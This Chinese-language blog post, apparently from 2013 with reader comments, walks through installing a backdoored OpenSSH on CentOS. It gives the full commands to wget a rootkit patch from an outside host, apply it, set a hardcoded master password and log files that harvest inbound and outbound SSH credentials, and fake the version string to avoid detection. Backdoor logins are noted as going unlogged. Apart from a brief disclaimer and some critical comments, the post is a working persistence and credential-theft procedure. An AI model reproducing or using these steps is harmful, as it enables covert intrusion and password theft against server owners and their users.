如何使用Linux通用后门

2013-06-14 785660人围观 ,发现 39 个不明物体 工具系统安全

特别提示:仅用于安全测试和教学,禁止非法用途。

标题党了,呵呵

其实就是个ssh后门,基本可以不用看内核版本,很简单,为照顾新手!

*************************************************************************

地址在这http://core.ipsecs.com/rootkit/patch-to-hack/(已被墙)

我以 openssh 5.9    centos 5.6 做演示

在这里找到对应的openssh版本 http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/

安装前首先

ssh -V

记录下原来ssh版本信息,免得安装后一看就版本不一样了

wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff   //patch  后门

vi includes.h                   //修改后门密码,记录文件位置,

/*
+#define ILOG "/tmp/ilog"                      //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog"                   //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321"    //你后门的密码
*/


vi version.h                                           //修改ssh版本信息,改成原来的

先安装所需环境不然会报错

yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log

需要安装zlib

yum install -y zlib zlib-devel    //  http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download  需要 make clean
make && make install
service sshd restart          //重启sshd

然后我们登录ssh看看

再ssh localhost看看

使用后门密码登录是不会被记录的

后门,记录一举两得,是不是很简单

下载地址

这些评论亮了

  • thanks (8级) FreeBuf常务处主任 回复
    楼主居心何在?
    ps.小编审稿不利啊:(
    )26( 亮了
  • 河蟹 回复
    @hongygxiang  这也是一种方法而已 别人发个文章 咋唧唧歪歪的 你以为人人都跟你一样是黑客啊 22端口都关闭啊
    )13( 亮了
  • M3loee 回复

    楼主居心何在?
    ps.小编审稿不利啊:(
    )12( 亮了
  • p0tt1 (6级) 黑客叔叔,RainRaid和SniFFeR.Pro团队负责人 回复
    直接用 老毛子的LBD吧 图形化后门 跟远控差不多了`
    )12( 亮了
  • hongygxiang (3级) PPTV安全工程师 回复
    @whitemonty@河蟹 两位哥,我错了,我既没有说这后门不行,我只是为了强调这个后门的弊端,我是亲爱的。
    )11( 亮了
发表评论

已有 39 条评论

取消
Loading...
css.php